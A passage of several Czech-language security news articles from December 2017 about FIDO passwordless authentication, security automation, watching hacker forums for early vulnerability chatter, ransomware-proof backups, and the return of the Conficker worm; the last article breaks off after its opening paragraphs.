Autentizační systém, který zlepšuje uživatelskou zkušenost, „bude sám o sobě pro poskytovatele služeb lákavý“. Útočník by potřeboval mít ve své ruce fyzické zařízení uživatele, aby se mohl pokusit o útok. To se pro útočníky s finanční motivací nehodí a není to ani moc použitelné.

Jaké jsou možnosti

Argument uživatelské zkušenosti prezentuje FIDO na svém webu. Existují podle ní dvě možné metody:

UAF (User Authentication Standard) jednoduše vyžaduje, aby uživatel požádal o transakci a následně se prokázal pomocí biometrie, jako je například otisk prstu.
U2F (Universal Second Factor) vyžaduje použít uživatelské jméno a heslo na lokálním zařízení. Uživatel následně dokončí transakci tak, že k počítači připojí USB klíč a stiskne na něm tlačítko.

McDowell uvádí, že rozdíl přinášející převratnou změnu spočívá v tom, že na rozdíl od hesel jsou autentizační pověřovací údaje vždy uložené v zařízení uživatele a nikdy se nikam nezasílají. Nemluvě o tom, že je to efektivní, protože dochází k eliminaci hrozeb odjinud – z jiných zemí i jiného města.

Problém s hesly není podle něj v samotných heslech, ale v tom, že jsou sdíleným tajemstvím, které znají nejen jednotliví uživatelé, ale také servery on-line poskytovatelů, odkud je ukrást je nejenže možné, ale dochází k tomu v počtech stovek milionů. To hackerům poskytuje „hesla zneužitelná pro další servery“.

McDowell prohlašuje, že UAF a U2F jsou mnohem rychlejší a pro uživatele pohodlnější, protože autentizace probíhá jednoduše „dotykem na snímač, pohledem do kamery nebo nošením náramku atd.“.

„Je to rozhodně rychlejší než hesla a mnohem rychlejší a pohodlnější než tradiční formy dvoufaktorové autentizace, jako jsou třeba jednorázová hesla (OTP).“

Možná rizika

Někteří experti ale uvádějí, že se zvyšuje riziko, že by útočníci mohli najít způsob, jak naklonovat biometrické vstupy, jako jsou skeny otisků prstů, hlasu či oční duhovky. „Já nechci poskytovat verzi své duhovky nikomu,“ uvádí McGraw.

McDowell uznává, že biometrické ověření lze podvést – nazývá to „prezentační útok“. Uvádí však, že standardy FIDO eliminují většinu rizik ze stejného důvodu, jak bylo už výše uvedeno – biometrické informace nikdy neopouštějí zařízení uživatele.

„Biometrický útok s využitím podvrhu proti pověřením FIDO lze uskutečnit jen tehdy, pokud by měl útočník fyzicky k dispozici zařízení uživatele,“ vysvětluje. „Nelze to udělat pomocí sociálního inženýrství, phishingu či malwaru.“

Gupta souhlasí, že to pravděpodobně velmi prodraží útoky a v důsledku toho zlepší zabezpečení. „Pokud nové formy autentizace dokážou zajistit, aby byly náklady na prolomení vyšší než hodnota získaná ze samotného průniku, budeme v bezpečí,“ vysvětluje.

Přesto si nikdo nemyslí, že hesla zmizí v dohledné době. Ačkoliv je McDowell velmi optimistický, co se týče standardu FIDO, je si vědom, že jeho přijetí bude trvat dlouho.

Poznamenává, že na trhu existuje více než 200 implementací s certifikací FIDO, které „překonaly jeho očekávání“.

Tato aliance také oznámila, že „Microsoft zaintegruje FIDO do systému Windows 10 za účelem autentizace bez použití hesla“ a že aliance také „pracuje s konsorciem WWW na standardizaci silné autentizace FIDO pro všechny webové prohlížeče a související webovou infrastrukturu“.

McDowell uznává, že „hesla se budou používat ještě dlouho. I když jsme na dobré cestě, abychom mohli vidět možnost použití autentizace FIDO ve většině aplikací a zařízení běžně používaných každý den, hesla budou v nadcházejících letech stále součástí těchto systémů.“

Přestože je McGraw příznivcem dvoufaktorové autentizace a jeho firma ji od svých zaměstnanců vyžaduje, připouští, že ve skutečnosti „nic jako dokonalost neexistuje. Vždy to budou závody ve zbrojení.“


Ochrání automatické zabezpečení i vás?

27.12.2017 SecurityWorld Zabezpečení
automatizace zabezpečení začíná přesahovat rámec technologií pro prevenci a detekci a dosahuje až k dalším důležitým součástem IT infrastruktury za účelem spolehlivější ochrany.

O automatizaci zabezpečení se sice hodně mluví, ale některé pojmy jsou nejasné.

Například Gartner se ve své zprávě o inteligentní a automatizované kontrole zabezpečení zaměřil na komponentu threat intelligence a další nové prvky automatizace zabezpečení označil souhrnně poněkud obecnějším způsobem.

Zde jsou čtyři z nejnovějších a nejpokročilejších prvků, které byste měli uvážit při diskuzi o automatizaci zabezpečení:

Vykonávání pravidel

Jak významně vzrostla složitost sítí, stala se ruční správa souvisejících zásad zabezpečení téměř nemožnou. Automatizace vykonávání pravidel označuje automatizaci jakékoliv správní činnosti požadované zabezpečením IT.

Řada dodavatelů nabízí nástroje pro automatizaci správy zásad zabezpečení sítě, které dokážou pomoci snáze dodržet interní a regulační požadavky zabezpečení. Někteří také nabízejí automatizované služby pro úkoly správy, jako je přidání a odebrání uživatele a řízení životního cyklu uživatelů.

Automatizace přidání, odebrání a uživatelského přístupu může pomoci týmům IT získat větší kontrolu nad daty, náklady a časem. Společnosti nabízející tyto nástroje někdy o sobě uvádějí, že nabízejí automatizaci zabezpečení.

Monitorování varování a stanovení priorit

Někteří lidé pohlížejí na činnost automatizace optikou monitorování a stanovení priorit varování. Tradičně bylo monitorování a stanovení priorit varování ruční a velmi jednotvárnou úlohou.

Tým analytiků v provozním centru zabezpečení by musel shromažďovat data a doslova celý den zírat na monitory, aby mohl rozhodnout, jaké údaje byly důležité. V současné době existují metody pro automatizaci monitorování a stanovení priorit varování. Liší se ale rozsahem propracovanosti.

Například mohou zahrnovat stanovení pravidel a prahových hodnot, využívání threat intelligence a implementaci pokročilejší behaviorální analytiky a technologie strojového učení.

Nastavení pravidel a prahových hodnot má menší efektivitu, protože závisí na ručním zadání údajů od osoby, která rozhodne, jaká varování jsou důležitá a jaká ne.

Vyžaduje to také pravidelnou údržbu těchto pravidel, protože se počítačové hrozby stále mění a hackeři často přesně vědí, jaká varování budou firmy hledat.

Spoléhání se na threat intelligence je na druhou stranu o něco spolehlivější. Tato forma automatizace odkazuje na soubor threat intelligence z různých zdrojů, a to může pomoci společnostem zjistit, jaká varování hledat a jaká jsou pro ně skutečně důležitá.

Pokud například podnik dokáže využívat více zpravodajských zdrojů, dozví se, když se někde ve světě objeví určitý typ útoku. Automatizované zpracování threat intelligence potom může společnosti pomoci připravit její ochranu před potenciálním útokem dříve, než by bylo příliš pozdě.

Behaviorální analytika a strojové učení patří mezi nejpokročilejší formy automatizace monitoringu a stanovení priorit varování, protože se nespoléhají na pravidla a prahové úrovně tzv. známých hrozeb.

Namísto toho se tento typ technologie dokáže učit, jak vypadá normální chování sítě, a snadno a okamžitě může upozornit na libovolné neobvyklé chování a následně statisticky skórovat prioritu každé potenciální hrozby, kterou by bylo dobré prošetřit.

Plánování reakce na incidenty

Plánování reakce na incidenty se také označuje za automatizaci zabezpečení. Jedním ze způsobů, jak si lze představit tuto technologii, je inteligentní systém tiketů, který pomáhá společnostem sledovat vývoj bezpečnostního incidentu a koordinovat kroky potřebné reakce.

Dodavatelé v tomto segmentu pomáhají společnostem vytvářet manuály pro různé typy hrozeb, takže mohou automatizovat části svých reakcí, kdy se počítá každá vteřina.

Automatizují pracovní postupy a pomáhají firmám zajistit komunikaci s příslušnými interními a externími kontakty, dodržovat regulační předpisy pro záležitosti, jako je oznámení týkající se soukromí, a vytvářet jasné záznamy pro audit.

Vyšetřování, akce a náprava

Automatizace vyšetřování, akce a náprava pro počítačové hrozby se týkají využívání technologie k takovému plnění úkolů, jako by je vykonával kvalifikovaný počítačový analytik.

Ostatní prvky automatizace zabezpečení (od zásad přes stanovení priority až po plánování) pracují určitým způsobem na dosažení tohoto konečného cíle – rychlého zjištění hrozeb a jejich eliminaci dříve, než ovlivní provoz.

Existují různé aspekty, co by mohl dodavatel zautomatizovat v oblasti vyšetřování, akce a nápravy. Někteří například řeší jen jednu z těchto tří komponent, zatímco jiní se zaměřují na specifické úlohy, jako je například automatizace karantény kompromitovaných zařízení.

Existují také firmy, které využívají automatizaci a umělou inteligenci k řízení celého procesu od začátku až do konce, jako by to dělal počítačový analytik.

Všechny tyto technologie automatizace zabezpečení uvolňují přetížený personál zabezpečení a dovolují týmům zabezpečení méně se věnovat všedním (ale nezbytným) činnostem a více se zaměřit na strategické iniciativy, které umožní zvýšit zabezpečení jejich společnosti.

Podle údajů Breach Level Index bylo v roce 2015 kompromitovaných každý den průměrně 1,9 milionu on-line záznamů. To je 80 766 záznamů každou hodinu a 1 346 záznamů každou minutu.

Téměř nepřetržitý výskyt on-line narušení přitom nevykazuje žádné známky zpomalení, takže si společnosti nemohou dovolit, aby je zdržovaly nedořešené otázky o konceptu a schopnostech automatizace zabezpečení.

Je dobré dát automatizaci infrastruktury zabezpečení IT vysokou prioritu a připustit, že lze automatizovat více oblastí, aby společnost zůstala v bezpečí. Automatizace vykonávání zásad, monitorování varování a stanovení priorit a plánování reakce na incidenty může dramaticky zvýšit firemní produktivitu a snížit náklady.

Pomocí plné automatizace vyšetřování, akcí a nápravy pro hrozby mohou firmy ve velkém simulovat zkušenosti a logiku zkušených počítačových analytiků, a zaručovat tak silnější zabezpečení a dodržování předpisů celkově.

Výhody a nevýhody automatizace zabezpečení

Kolem použití automatizace v oblasti počítačové bezpečnosti existuje celá řada obav:

Ztráta kontroly -- V mnoha případech je největší překážkou k automatizaci jednoduše vnímaná ztráta kontroly. Ve skutečnosti může správný nástroj automatizace zajistit vyšší míru viditelnosti a lepší přehled o celém procesu počítačové bezpečnosti.

Nedostatek důvěry -– Pro vysoce kvalifikované pracovníky je snadné mít pocit, že jsou schopnější řídit reakce na incidenty, než by to dokázal počítač. Nedůvěra k technologii tak může být neuvěřitelně velkou překážkou, kterou je potřeba překonat, ale nakonec – s ohledem na změnu druhu, frekvence a složitosti útoků – je to marný argument.

Strach ze změny – Asi největším omylem týkajícím se automatizace je představa, že přijetí automatizace způsobí určitý zánik pracovních míst.

Co se stane, když technologie převezme proces reakcí na incidenty? Bude oddělení IT nahrazeno roboty? Faktem je, že zatímco automatizace určitě mění způsob, jakým lidé pracují, vytváří stejně tolik příležitostí, kolik jich eliminuje.

Pro řešení těchto vnímaných nevýhod lze ale použít řadu významných faktů o pozitivní úloze automatizace v počítačovém zabezpečení.

Sjednocení sil – Žádný vojenský velitel by nešel do boje s armádou významně menší co do velikosti, síly a schopností, než by měl jeho nepřítel. Stejný koncept může být a měl by být aplikovaný na důležité úlohy počítačové bezpečnosti. Automatizace poskytuje schopnost reagovat na příchozí útoky krok za krokem, a poskytuje přitom nejvyšší možnou úroveň ochrany.

Zvýšená efektivita – Přidání automatizace do procesu reakce na incidenty pomáhá zjednodušit pracovní postupy a vytvořit mnohem jednotnější a efektivnější prostředí. Nejenže tedy zvyšuje sílu organizace ve smyslu zabezpečení, ale způsobuje také zlepšení celkové hospodárnosti.

Méně chyb – Mnoho z nejpozoruhodnějších počítačových narušení v posledních letech nastalo v důsledku lidských chyb z přepracovanosti. I ten nejzkušenější odborník v oblasti IT může udělat čas od času nějakou chybu.

Některé chyby se však bohužel mohou ukázat jako neuvěřitelně nákladné. Automatizace tento problém eliminuje tím, že z některých nebo ze všech částí procesu odstraní lidský faktor.

Lepší rozhodování – Jednou z největších výzev, kterým šéfové IT čelí, je kolosální úkol dělat v reálném čase důležitá firemní rozhodnutí. Další výhodou automatizace je schopnost shromažďovat, analyzovat a zvýšit prioritu důležitých dat na kliknutí tlačítka, což dále zlepšuje detekci hrozeb a proces správy incidentů.

Vzhledem k tomu, že jsou průměrné roční náklady na počítačové útoky v rozmezí od desítek tisíc dolarů u malých firem až po řadu miliard u globálních podniků, je téma počítačové bezpečnosti něco, na co by měl každý šéf organizace v současné době pamatovat.

Ještě důležitější je, že v současné době používané strategie je potřebné řádně posoudit a dostatečně opevnit, pokud se firma nechce stát další obětí.

Navzdory mnoha mylným pohledům se automatizace ukazuje jako ideální nástroj pro zefektivnění a posílení procesu reakce na incidenty a vytvoření lepší linie obrany, která obstojí ve zkoušce času.


Hackněte hackery

26.12.2017 SecurityWorld Hacking
Sledování on-line diskuzí na fórech hackerů vám poskytne představu o šťavnatých zranitelnostech, které váš dodavatel zatím neopravil.

V moři zranitelností volajících po vaší pozornosti je téměř nemožné zjistit, jaké problémy zabezpečení IT řešit jako první. Rady dodavatelů poskytují vyzkoušené prostředky pro ochranu před známými vektory útoků. Je zde ale ještě výhodnější možnost: Zjistit, o čem se baví samotní hackeři.

Vzhledem ke stále většímu prostoru, kde lze vést útoky, se většina organizací snaží provázat svůj cyklus správy zranitelností s oznámeními dodavatelů. Prvotní odhalení zranitelností zabezpečení však nemusí vždy pocházet přímo od dodavatelů.

Čekání na oficiální oznámení může způsobit, že budete mít vůči útočníkům zpoždění v řádu dnů či dokonce týdnů. Útočníci diskutují a sdílejí návody během hodin poté, co dojde k objevení zranitelnosti.

„On-line diskuze obvykle začínají za 24 až 48 hodin od úvodního zveřejnění,“ uvádí Levi Gundert, viceprezident threat intelligence ve společnosti Recorded Future, s odvoláním na firemní hloubkovou analýzu diskuzí v cizojazyčných fórech.

Rady dodavatelů, příspěvky na blozích, zprávy distribuované pomocí mailingových seznamů a varování skupin CERT – obránci nejsou jediní, kdo čte tato oznámení. Vědět, co vzbuzuje zájem útočníků a jakým způsobem hodlají díry zneužít dříve, než mohou dodavatelé zareagovat, je skvělý způsob, jak se svézt na další vlně útoků.

Upovídaný hacker

Chyba serializace objektů Java z minulého roku je dokonalým příkladem. Tato chyba byla poprvé popsána na konferenci v lednu 2015 a nepřitahovala pozornost až do 6. listopadu tohoto roku, kdy výzkumníci ze společnosti FoxGlove Security zjistili, že tento problém ovlivní vícejádrové základní podnikové aplikace, jako jsou například WebSphere a JBoss.

Společnosti Oracle trvalo dalších 12 dní a firmě Jenkins 19 dní vydání formálního oznámení, které se týkalo zranitelností v produktech WebLogic Server a Jenkins.

Komunity útočníků však začaly diskutovat o příspěvku na blogu FoxGlove Security za několik hodin a společnost Recorded Future zjistila, že kód umožňující zneužití, který ověřoval koncept, se objevil za pouhých šest dní.

Podrobný návod pro zneužití, popisující, jak vykonat útok, byl k dispozici 13. listopadu, tj. pět dní předtím, než firma Oracle cokoli vydala. V prvním prosincovém týdnu již útočníci prodávali jména zranitelných organizací a specifické odkazy pro vyvolání zranitelností těchto cílů.

„Je zřejmé, že doba mezi rozpoznáním zranitelnosti a okamžikem, kdy dodavatel vydá opravu nebo alternativní řešení, je pro aktéry hrozeb cenná, ale když se podrobné návody pro zneužití objeví ve více jazycích, může být tento rozdílový čas pro firmy doslova katastrofální,“ popisuje Gundert.

Zranitelnost OPcache Binary Webshell v PHP 7 je dalším příkladem toho, jaký mají útočníci náskok. Bezpečnostní firma GoSecure popsala nový exploit dne 27. dubna a společnost Recorded Future vydala návod vysvětlující, jak používat ověření konceptu odkazované v blogovém příspěvku GoSecure ze dne 30. dubna.

Jak firma GoSecure uvedla, vliv zranitelnosti na aplikace PHP nebyl univerzální. S výsledným návodem však bylo pro útočníky snadnější najít servery s potenciálně nebezpečnou konfigurací, která je činila zranitelnými vůči nahrání souboru.

„Oznamovaly to dokonce i obskurní blogy,“ připomíná Gundert. Většina lidí si přitom blogového příspěvku GoSecure nevšimla. Pokud nezíská blogový příspěvek dostatečnou pozornost u komunit obránců, může diskutovaný potenciální vektor útoku zůstat bez povšimnutí v důsledku velkého množství konkurenčních zpráv.

Na druhé straně bitevní linie však útočníci diskutují o chybě a sdílejí informace a nástroje pro její zneužití.

Čekání činí problémy

Jedním z důvodů, proč útočníci získávají tak velký náskok vůči dodavatelům a bezpečnostními profesionálům, je samotný proces oznamování zranitelností.

Oznámení dodavatelů je obvykle vázáno na okamžik, kdy chyba dostane identifikátor CVE (Common Vulnerability and Exposures). Systém CVE spravuje nezisková organizace Mitre.

Funguje jako centrální úložiště pro veřejně známé zranitelnosti zabezpečení informací. Když někdo najde zranitelnost zabezpečení – ať už je to majitel aplikace, výzkumník nebo třetí strana jednající jako zprostředkovatel – společnost Mitre dostane žádost o vydání dalšího identifikátoru CVE.

Jakmile Mitre přiřadí identifikátor, který pro zranitelnosti funguje podobně jako rodná čísla, mají podniky, dodavatelé a obor zabezpečení způsob pro identifikaci, diskuzi a sdílení podrobností o chybě, takže ji lze opravit.

V případech, kdy počáteční odhalení nepochází od dodavatelů, jako to bylo například s chybou serializace objektů Java, mají útočníci náskok vůči obráncům, kteří čekají na přiřazení identifikátoru CVE.

Tento časový rozdíl je kritický. Samozřejmě že když je nutné prozkoumat, vyhodnotit a zmírnit tolik zranitelností, ale pro boj s nimi jsou k dispozici jen limitované bezpečnostní zdroje, je filtrování zpráv o zranitelnostech na základě přiřazenosti identifikátoru CVE „rozumným postojem“, který organizacím umožňuje hrát na jistotu, vysvětluje Nicko van Someren, technologický ředitel Linux Foundation. Závěr je, že jakmile chyba má CVE, je její existence potvrzena a vyžaduje pozornost.

V poslední době se však samotný systém CVE stal překážkou. Několik bezpečnostních profesionálů si stěžovalo, že nemohou od společnosti Mitre získat CVE včas. Zpoždění má důsledky – je těžké koordinovat opravu chyby s dodavateli softwaru, partnery a dalšími výzkumníky, když neexistuje systém, který by zajistil, že se všichni zabývají stejnou záležitostí.

Součástí problému je také měřítko, protože je softwarový průmysl větší, než byl před deseti lety, a zranitelnosti se nalézají ve větším množství. Jak ukázala analýza společnosti Recorded Future, zpoždění v přiřazení CVE dává útočníkům čas k vytvoření a zdokonalení jejich nástrojů a metod.

„Existuje mnoho lidí, kteří věří, že pokud není přiřazen identifikátor CVE, nejde o reálný problém – a to je skutečný průšvih,“ uvádí Jake Kouns, šéf zabezpečení ve společnosti Risk Based Security.

Dalším problémem totiž je, že ne všechny zranitelnosti dostanou svůj identifikátor CVE, jako například webové aplikace, které jsou aktualizované na serveru a nevyžadují interakci se zákazníky.

Bohužel chyby mobilních aplikací, které vyžadují interakci se zákazníky pro instalaci aktualizace, také nedostávají identifikátory CVE. V loňském roce bylo oznámených 14 185 zranitelností, což je o šest tisíc více, než bylo evidováno v národní databázi zranitelností a ve CVE, uvádí zpráva „2015 VulnDB Report“ společnosti Risk Based Security.

„Skutečná hodnota systému CVE pro spotřebitele a pracovníky zabezpečení informací není v měření rizika a dopadu na zabezpečení, ale v katalogizování všech známých rizik pro systém bez ohledu na závažnost,“ popisuje Kymberlee Priceová, šéfka výzkumné činnosti ve společnosti BugCrowd.

Je čas začít naslouchat

Protože CVE nepokrývá každý exploit, musíte hledět za jeho hranice, pokud chcete dostat úplný obraz toho, s čím se můžete setkat. Znamená to, že byste měli přestat vázat své aktivity správy zranitelností výhradně na oznámení dodavatelů a začít zkoumat i další zdroje informací, abyste udrželi krok s nejnovějšími zjištěními.

Vaše týmy správy zranitelností budou efektivnější, pokud budou hledat zmínky o prověření konceptů na internetu a příznaky aktivity exploitů ve vašem prostředí.

Existuje mnoho veřejně dostupných informací o zranitelnostech, které nabízejí více než pouhé oficiální oznámení dodavatele. Těchto informací je ale tolik, že obránci nemohou očekávat, že by mohli udržet krok se všemi příspěvky na blozích, které odhalují různé zranitelnosti, s mailingovými diskuzemi mezi výzkumníky ohledně konkrétních chyb zranitelností a s dalšími veřejnými informacemi.

Namísto pokusu přihlásit se ke každému existujícímu mailingovému seznamu a RSS kanálu by měl váš tým správy zranitelností jít přímo na fóra a naslouchat, co říkají potenciální útočníci. To je ten nejlepší druh včasného varování.

„Pokud jsem ve své organizaci zodpovědný za správu zranitelností, měl bych dávat pozor na diskuze na fórech a hledat podstatné diskuze o konkrétních zranitelnostech,“ radí Gundert. „Neudržíte sice krok s nultým dnem, ale zachytíte chyby, o kterých byste se jinak dozvěděli z pokynů od dodavatelů až za týdny.“

Jako firma nabízející threat intelligence chce Recorded Future, aby podniky používaly její platformu k naslouchání diskuzím o hrozbách na fórech, anglických i cizojazyčných, existují však i další možnosti.

Organizace si mohou vybrat pro sledování diskuzí několik fór, kanálů IRC a dalších on-line zdrojů. Analytici z Record Future si všimli uživatelů důsledně sdílejících příspěvky psané jednotlivci, kteří se zdají být uznávaní jako spolehlivý zdroj informací.

Pouhé sledování toho, co tito „experti“ říkají, by mohlo pomoci odhalit diskuze o nejnovějších chybách. Sledování toho, co se sdílí na GitHubu, může také velmi pomoci při odkrývání plánů útočníků.

Threat intelligence pomáhá zlepšit poměr potřebných informací vůči šumu a odhalit užitečné informace, ale není to jediný způsob, jak najít tyto diskuze.

Obránci by měli sledovat, zda se v jejich sítích nezvýšila skenovací aktivita. Zvýšení indikuje pravděpodobnost, že existují diskuze o tom, jak vyvolat zranitelnosti.

Experti Recorded Future si například všimli, že skenování zaměřené na skriptovací stroj Groovy ve službě Elasticsearch začalo „téměř okamžitě“ po odhalení zranitelnosti pro vzdálené spuštění kódu. „Na fórech se také přetřásaly způsoby, jak zneužít a udržet systémy ve zkompromitovaném stavu,“ uvádí Gundert.

Chyby s možností vzdáleného spuštění kódu téměř okamžitě vyvolají on-line diskuze. Lokální exploity, které vyžadují, aby útočník nejprve v zařízení nějakým způsobem získal oporu, naopak tolik diskuzí nevyvolávají.


Ochrání vás zálohy před ransomwarem?

26.12.2017 SecurityWorld Viry
Zálohy by měly ze své podstaty velice jednoduše posloužit k obnově provozu po ataku ransomwaru. Velmi často se tak ale neděje. Co je důvodem a jaká opatření je vhodné udělat, abyste mohli výhody back-upu využít i při těchto incidentech?

Teoreticky by nikdo neměl vyděračům využívajícím ransomware platit žádné peníze. Nemáme snad všichni v současné době zálohy? I spotřebitel má přístup k široké řadě bezplatných či levných zálohovacích služeb.

Zprávy jsou ale plné informací o institucích, jako jsou nemocnice, které by měly používat plány pro zajištění nepřetržitého provozu a využívat solidní zálohovací strategie.

Přesto však bylo podle FBI jen v USA zaplaceno více než 209 milionů dolarů v platbách za ransomware v průběhu prvních tří měsíců roku 2016, což je oproti pouhým 25 milionům dolarů za celý rok 2015 citelný nárůst.

Co se děje? Proč zálohy nefungují? Z důvodu finančních úspor některé organizace nezahrnují všechny své důležité soubory do svých záloh nebo nezálohují dostatečně často. Jiní zase své zálohy netestují a zjistí, že systémy nefungují, až když je příliš pozdě.

A konečně, některé společnosti ukládají své zálohy na síťové jednotky, kde je dokáže ransomware snadno najít a zašifrovat.

Jaký rozsah zálohování stačí?

Vždy je zde kompromis mezi cenou a bezpečností a většina organizací upřednostní své výdaje.

„Historicky bylo možné na klientském trhu v oblasti zálohování klientských dat vidět, že když oddělení IT viděla náklady na úložiště pro ukládání všech dat, moc se jim do takových investic nechtělo,“ uvádí David Konetski ze společnosti Dell.

To však podle něj platilo před exponenciálním snížením cen úložišť v období před pěti až deseti lety. „Nyní žijeme ve světě skutečně levných úložišť a cloudových úložišť,“ tvrdí Konetski.

Navíc by nemuselo stačit zálohovat jen důležitá data a dokumenty. Může být potřeba zazálohovat celé počítače, pokud jsou důležité pro podnikání.

Například ve zdravotnickém zařízení Hollywood Presbyterian Medical Center, kde nedávno zaplatili kyberzločincům ekvivalent 17 tisíc dolarů, ransomware nejenže zašifroval důležité soubory, ale rovněž vážně poškozoval provoz po dobu deseti dnů a přinutil personál vrátit se zpět k papírovým záznamům a faxům.

Místní zpravodajské organizace oznámily, že někteří pacienti s potřebou naléhavé péče byli převezeni do jiných nemocnic.

„Tento malware uzamkl přístup k některým počítačovým systémům a zabránil nám elektronicky komunikovat,“ uvedl výkonný ředitel Allen Stefanek této instituce v dopise veřejnosti. Pro nemocnici byla podle něj nejrychlejším způsobem obnovení systémů platba výkupného.

Ne vždy to však problém vyřeší. Objevily se i zprávy, že nemocnice například zaplatily výkupné a slíbené klíče nedostaly nebo se vznesl požadavek na ještě vyšší částku.

Pokud by byly okamžitě k dispozici čisté bitové kopie pro infikované počítače, mohla by nemocnice zcela smazat infikovaný hardware a obnovit na něm poslední dobrou verzi.

Organizace nemusejí ukládat několik kompletních kopií každého systému – přírůstkové zálohovací systémy jsou velmi efektivní, protože uloží jen poslední změny.

„Pokud dojde ke kompromitaci celého systému, můžete se vrátit zpět k holému hardwaru,“ vysvětluje Stephen Spellicy, šéf produktového managementu, ochrany podnikových dat a správy mobilních informací ve společnosti HPE.

Otestování záloh

Vytvoření komplexní strategie zálohování je komplikovaný proces, zejména pro velké podniky s více typy dat, souborů a systémů, které je potřeba chránit.

Tato komplexnost je jedním z důvodů, proč zálohy nefungují, upozorňuje Stephen Cobb, výzkumník z Esetu. Dalším důvodem je, že zálohy nemusejí proběhnout nebo může být proces obnovy příliš obtížný.

„Největší problém, se kterým se společnosti setkávají, když dojde k jejich napadení ransomwarem, spočívá v tom, že v nedávné době neudělaly test svého procesu obnovy,“ popisuje. „Zálohovaly, ale netrénovaly obnovení – existuje k tomu vtipný důkaz, když se někteří správci ptají: ‚Kolik trápení způsobí obnova ze zálohy ve srovnání s platbou výkupného?‘“

Mnoho firem nevykonává řádné testování svých záloh, potvrzuje Spellicy z HPE. „Jedním z hlavních důvodů, proč se nám daří najít zákazníky, je, že se neúspěšně snažili využít obnovení od jiného dodavatele a nyní hledají nové řešení. Když to potřebujete, musí to fungovat. Je to velmi kritické – pokud nemůžete zálohu využít, potom je bezcenná.“

Skrytí zálohy před zločinci

Kybernetičtí ​​vyděrači vědí, že zálohy jsou jejich nepřítel číslo jedna, a přizpůsobují svůj ransomware tak, aby je vyhledával.

„Několik rodin ransomwaru ničí všechny stínové kopie (Shadow Copy) a body obnovení v systémech Windows,“ uvádí Noah Dunker, ředitel bezpečnostních laboratoří společnosti RiskAnalytics. „Mnoho typů ransomwaru se zaměřuje na všechny připojené disky a šifruje také zálohy, přestože to možná není promyšlený záměr.“

Každý souborový systém připojený k infikovanému počítači je potenciálně zranitelný stejně jako připojené externí pevné disky a zasunuté USB Flash disky.

Tipy pro spolehlivější zálohy

1. Každodenní zálohy

Používejte on-line službu pro synchronizaci souborů, která nepřetržitě zálohuje soubory, na nichž zaměstnanci pracují. Další možností je zapnout synchronizaci ve vlastní síti, ale pomocí proprietárních protokolů, aby záloha nebyla viditelná pro útočníky.

Nebo pokud není k dispozici nic jiného, by zaměstnanci měli začít používat starou metodu a navyknout si jednou nebo dvakrát denně zazálohovat své důležité soubory na externí disk, který bude jinak odpojený.

Pokud by ransomware vyřadil jejich počítač, mohou zaměstnanci pokračovat v práci z jiného místa, zatímco by docházelo k obnově funkce jejich počítače.

2. Střednědobé zálohy

Ukládejte pravidelné zálohy uživatelských počítačů na snadno dostupných zařízeních pro ukládání dat, která jsou logicky izolována od zbytku sítě. Použijte je k rychlému obnovení uživatelských počítačů do posledního funkčního stavu.

3. Dlouhodobé zálohy

Používejte off-line úložiště, fyzicky izolované od zbytku vaší společnosti, pro méně časté, ale komplexní zálohování všeho, co vaše firma potřebuje obnovit v případě nouze.

„Aby vaše zálohy odolaly ransomwaru, měli byste použít disky nepřipojené ke konkrétní pracovní stanici,“ prohlašuje Sam McLane ze společnosti ArcticWolf Networks. „Například můžete přenášet data přes síť na jinou pracovní stanici nebo úložné zařízení pomocí zálohovací aplikace. Zajistěte, aby toto úložné řešení zůstalo chráněné a nebylo dostupné uživatelským pracovním stanicím, zejména pokud mají přístup k internetu.“

Je potřeba používat bezpečnostní kontroly, které oddělí uživatele od záloh, radí Todd Feinman, výkonný ředitel společnosti Identity Finder, která se zabývá utajením dat. Dobrou praxí je také používat dobře zabezpečené a šifrované zálohování do jiné lokality.

„Není potřebný každodenní přístup – tyto zálohy jsou určené jen pro případ nouze, když vše ostatní selže,“ uvedl.

Pro každodenní použití, například když zaměstnanci nechtěně smažou důležité soubory a potřebují je obnovit, existuje mnoho služeb synchronizace souborů, dodává Feinman.

Tyto systémy budou neustále sledovat změny v souborech. Pokud se však do počítače dostane malware a zašifruje všechny soubory, bude toto zašifrování zrcadlené zálohovacím systémem také.

Naštěstí se obvykle uchovávají předchozí verze souborů. „Jakmile jsou aktuální soubory zašifrované, budou zašifrované i jejich zálohy. Firma tedy bude muset udělat obnovu pomocí předchozí zálohy, která zakódovaná není,“ říká Craig Astrich, ředitel společnosti Deloitte Cyber Risk Services.

Samotný ransomware se však může skrývat i v šifrovaných souborech, když dochází k jejich zálohování.

„Pokud dojde k zazálohování zakódovaného souboru v rámci zálohovacího procesu, může znovu zašifrovat prostředí po jeho obnovení,“ varuje Scott Petry, spoluzakladatel a výkonný ředitel společnosti Authentic8.

To by podle něj mohlo dostat uživatele do smyčky neustálého obnovování zálohy a zašifrování. Každý proces zálohování by se tedy měl dělat společně se skenováním na přítomnost malwaru, aby se odhalily tyto nebezpečné soubory před zálohováním či obnovením.

Netýká se to jen dat

Pokud ztráta souborů a zablokování systémů zásadně důležitých pro provoz nestačí, může ransomware napáchat ještě více škody. Může zakrývat další útoky.

„Pokrokoví hackeři využívají ransomware jako sekundární formu infekce nebo jako obranu proti reakci na incidenty,“ prohlašuje Tom Kellermann, výkonný ředitel společnosti Strategic Cyber Ventures.

Útočníci se mohou dokonce zmocnit firemní komunikace či webu, aby více rozšířili infekci ransomwarem.


Zákeřný červ děsí bezpečnostní experty i po letech

26.12.2017 Novinky/Bezpečnost Viry
První verze zákeřného červa Confickera začala internetem kolovat už v roce 2008. Přestože zabezpečení počítačových systémů od té doby prošlo značným vylepšením, nové verze této hrozby stále nepřestávají strašit. Aktuálně dokonce tento nebezpečný malware patří mezi tři nejrozšířenější virové hrozby na světě. Vyplývá to ze statistik antivirové společnosti Check Point.
Ve zmiňovaném roce 2008 byl Conficker několik dlouhých měsíců nejrozšířenější hrozbou vůbec, platilo to prakticky i celý rok 2009. V uplynulých letech však o sobě tento nezvaný návštěvník nedával vůbec vědět.

Zlom nastal až loni a letos před Vánocemi, kdy jej kyberzločinci začali hojně využívat. V tuzemsku i v zahraničí tak podle analýzy antivirové společnosti Check Point představoval tento červ třetí nejrozšířenější hrozbu vůbec.

První dvě příčky patří škodlivým kódům RoughTed a Rig ek, které jsou však výrazně mladší než zmiňovaný Conficker.

Napadl i počítače v elektrárně
